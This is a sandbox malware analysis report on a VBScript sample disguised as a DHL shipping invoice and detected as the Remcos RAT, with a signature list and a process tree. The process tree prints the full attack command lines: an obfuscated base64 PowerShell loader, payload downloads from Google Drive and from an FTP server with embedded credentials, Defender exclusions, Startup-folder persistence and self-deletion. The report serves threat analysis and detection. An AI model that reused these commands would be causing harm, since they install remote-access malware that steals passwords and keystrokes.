Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_Shipping_Invoices_Awb_0000000.vbs

Overview

General Information

Sample name:DHL_Shipping_Invoices_Awb_0000000.vbs
Analysis ID:1533046
MD5:f757be4bc8889174f9c6c45d6302e00d
SHA1:07028abbc63ce0ab275c0b495451c38c3f686358
SHA256:42f3a74c4a534ce4ac65b5e14474a905e8fbdcab70cc6d330ef763062b80a2a4
Tags:DHLvbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Copy file to startup via Powershell
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (STR)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses FTP
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1632 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAKQAnAEAAQA' + [char]66 + 'wAEoAOAA3ADUAMQAyAG8Acg' + [char]66 + 'wAHIAZQ' + [char]66 + 'wAG8AbA' + [char]66 + 'lAHYAZQ' + [char]66 + 'kACcALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAaw' + [char]66 + 'yAG8Adw' + [char]66 + '0AGUATgAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbwAtAHcAZQ' + [char]66 + 'uACAAPQAgAHMAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQwAuAGcAag' + [char]66 + 'nAGYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7AGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7AH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACwAQg' + [char]66 + 'LAEwAUg' + [char]66 + 'VACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHkAYg' + [char]66 + 'uAGoAbQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '5AGIAbg' + [char]66 + 'qAG0AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '5AGIAbg' + [char]66 + 'qAG0AJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66 + 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66 + 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAHEAeQ' + [char]66 + 'mAGwAeQAkACgAIAA9ACAAcQ' + [char]66 + '5AGYAbA' + [char]66 + '5ACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66 + 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ' + [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAcQ' + [char]66 + '5AGYAbA' + [char]66 + '5ACQAKAAgAD0AIA' + [char]66 + 'xAHkAZg' + [char]66 + 'sAHkAJA' + [char]66 + '7ACAAKQAgAEQAVw' + [char]66 + 'nAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHEAeQ' + [char]66 + 'mAGwAeQAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJA' + [char]66 + '7ACAAKQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAOwA=';$tcqrr = $qKKzc; ;$tcqrr = $qKKzc.replace('???' , 'B') ;;$nnwch = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $tcqrr ) ); $nnwch = $nnwch[-1..-$nnwch.Length] -join '';$nnwch = $nnwch.replace('%XRqhI%','C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs');powershell $nnwch MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 2804 cmdline: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 5324 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • powershell.exe (PID: 1276 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5524 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5836 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7224 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • AddInProcess32.exe (PID: 7332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 7696 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ojhkcpeuacbdoxkfkfvppkwbxin" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 7704 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 7724 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 7732 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\bfaoezapjsmubrunlbusdjlbpdpjcsomhv" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • cmd.exe (PID: 7232 cmdline: cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 7392 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7484 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 7632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cmd.exe (PID: 7760 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
